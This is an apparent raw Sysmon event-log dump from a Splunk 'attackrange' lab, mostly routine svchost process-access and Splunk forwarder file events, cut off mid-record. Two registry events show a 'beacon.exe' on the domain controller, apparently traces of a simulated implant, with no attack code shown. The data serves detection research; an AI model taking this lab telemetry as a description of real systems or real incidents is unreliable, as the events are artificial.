10341000x800000000000000021219537Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B8-6168-3F61-04000000F101}4464C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219536Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219535Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219534Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219533Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219532Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219531Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219530Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219529Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219528Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219527Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219526Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219525Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219524Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219523Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B3-6168-3061-04000000F101}1032C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219522Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B7-6168-3E61-04000000F101}4336C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219521Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B7-6168-3E61-04000000F101}4336C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219520Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B7-6168-3E61-04000000F101}4336C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219519Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B7-6168-3E61-04000000F101}4336C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219518Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.695{AD5E2759-5433-6143-0D00-00000000F101}792812C:\Windows\system32\svchost.exe{AD5E2759-A1B7-6168-3E61-04000000F101}4336C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219517Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:47.325{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EACAEE6DD216AFA4A1F13277D1AB8B9,SHA256=9F1ECBF8CA74715B3576FE9C82A8C19B3099A7FAFC92CD226A9818CD7702F3C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:47.052{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:47.052{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53BB00277F6CA560502D748AED80C3C6,SHA256=A5477E1AB1F3B71B0F91891029BE0B49FAE437E0242C28C22F62CBB03386BF05falsetrue 12241200x800000000000000057345183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:48.935{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057345182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:48.920{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057345181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:19.604{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54536-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:48.272{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:48.271{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90489B225E8797FAAA3BBB0C70B4C3ED,SHA256=2EE39C9263E887A70414EC0932A53A0F72A2AF5E97719F6FBC5236E1A66D2121falsetrue 11241100x800000000000000057345178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:48.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:48.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=417BAA6C3AB57AA19F3E33ED5B6EA31F,SHA256=FAB5C332E1F7F99D8CED738FC1AABF72AEEAD905D11FA2236A64BE5EBDC57A5Cfalsetrue 11241100x800000000000000057345176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:48.070{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:48.069{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0733DD0B58928794E28D3B56D4EC9FC1,SHA256=9C62F1F1C4E4C1731200DB496AE700CEB3A5F51E83C2EF0AB39B0ED0AB2D22F8falsetrue 23542300x800000000000000021219540Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:48.336{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FBABA1F70561D05AB45701203289D2D,SHA256=692C2192BA46EFC1BAB7D80FF384515F09F26A409F29DC6299E4385DCFFFB30F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219543Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:49.336{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4830728955586789F5CBBE0439C7C6AB,SHA256=F917AD0DD259AC4596750D97179648107B8B09869A84F8BBDE0EFE8B9EF5BE0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.935{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.935{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90489B225E8797FAAA3BBB0C70B4C3ED,SHA256=2EE39C9263E887A70414EC0932A53A0F72A2AF5E97719F6FBC5236E1A66D2121falsetrue 10341000x800000000000000057345217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-887D-6164-2A00-00000000F101}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-887D-6164-2A00-00000000F101}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 